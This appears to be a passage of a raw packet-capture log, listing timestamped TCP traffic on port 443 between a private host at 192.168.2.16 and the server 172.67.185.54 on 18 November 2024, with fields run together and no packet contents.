                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.232851982 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.232853889 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.232884884 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.346352100 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.346443892 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.346554041 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.346900940 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.346936941 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.963537931 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.963659048 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.965250015 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.965281010 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.965632915 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.966815948 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.011327982 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.328583002 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.328717947 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.328794956 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.328816891 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.328849077 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.328917980 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.328943968 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.329108000 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.329166889 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.329195976 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.329298019 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.329355955 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.329370975 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.376631021 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.376652956 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.424623966 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.445158005 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.445353985 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.445435047 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.445453882 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.445590973 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.445652962 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.445666075 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.446088076 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.446152925 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.446166992 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.446269035 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.446330070 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.446343899 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.488637924 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.488656998 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.536633015 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.562217951 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.562378883 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.562448978 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.562472105 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.562560081 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.562624931 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.562645912 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.562923908 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.562984943 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.562998056 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.563108921 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.563163996 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.563177109 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.563625097 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.563684940 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.563698053 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.616605043 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.616617918 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.664635897 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.679598093 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.679785013 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.679852962 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.679867983 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.679961920 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.680022955 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.680036068 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.680229902 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.680295944 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.680309057 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.680480957 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.680537939 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.680551052 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.728631020 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.796463966 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.796493053 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.796601057 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.796603918 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.796634912 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.796673059 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.796700001 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.796935081 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.797009945 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.797059059 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.797281027 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.797353029 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.797369003 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.797430992 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.798037052 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.798059940 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.798129082 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.913511038 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.913652897 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.913741112 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.913862944 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.914557934 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.914644957 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.914823055 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:39.914896011 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.030649900 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.030754089 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.030791998 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.030864954 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.030936003 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.031013012 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.031474113 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.031548977 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.147366047 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.147459030 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.147480011 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.147553921 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.147842884 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.147921085 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.148200989 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.148276091 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.148293972 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.148363113 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.264300108 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.264406919 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.264439106 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.264480114 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.264508963 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.264539003 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.264991045 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.265054941 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.265501022 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.265561104 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.353122950 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.353226900 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.381560087 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.381639957 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.381710052 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.381784916 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.381860018 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.381923914 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.381928921 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.381942987 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.381979942 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.382334948 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.382395983 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.382415056 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.382464886 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.498284101 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.498387098 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.498425007 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.498492956 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.498692036 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.498773098 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.498966932 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.499033928 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.539921045 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.540004969 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.615372896 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.615470886 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.615508080 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.615592957 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.615637064 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.615705967 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.615928888 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.616004944 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.616491079 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.616564989 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.706965923 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.707120895 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.735021114 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.735050917 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.735099077 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.735150099 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.735203028 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.735285997 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.735328913 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.849621058 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.849742889 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.849785089 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.849817991 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.849847078 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.849870920 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.933671951 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.933743000 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.933825016 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.933856964 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.933888912 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.933908939 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.970431089 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.970501900 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.970577955 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.970596075 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.970632076 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:40.970664024 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.087379932 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.087444067 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.087482929 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.087496042 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.087512016 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.087604046 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.089545012 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.089596033 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.089631081 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.089637995 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.089664936 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.089680910 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.203969002 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.204041958 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.204071045 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.204087019 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.204117060 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.204138994 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.206347942 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.206393957 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.206428051 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.206440926 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.206487894 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.206487894 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.321331024 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.321383953 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.321414948 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.321427107 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.321449995 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.321468115 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.323107004 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.323153973 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.323187113 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.323194027 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.323221922 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.323239088 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.438159943 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.438213110 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.438244104 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.438256025 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.438270092 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.438297987 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.440696001 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.440741062 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.440773010 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.440781116 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.440808058 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.440818071 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.555399895 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.555465937 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.555510044 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.555526972 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.555557013 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.555574894 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.557168961 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.557223082 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.557260990 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.557272911 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.557315111 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.557334900 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.672466040 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.672527075 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.672559023 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.672570944 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.672602892 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.672620058 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.674150944 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.674196005 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.674240112 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.674247980 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.674261093 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.674284935 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.789122105 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.789185047 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.789249897 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.789273977 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.789289951 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.789314985 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.790889978 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.790936947 CET44349716172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.790971041 CET49716443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:41.790978909 CET44349716172.67.185.54192.168.2.16
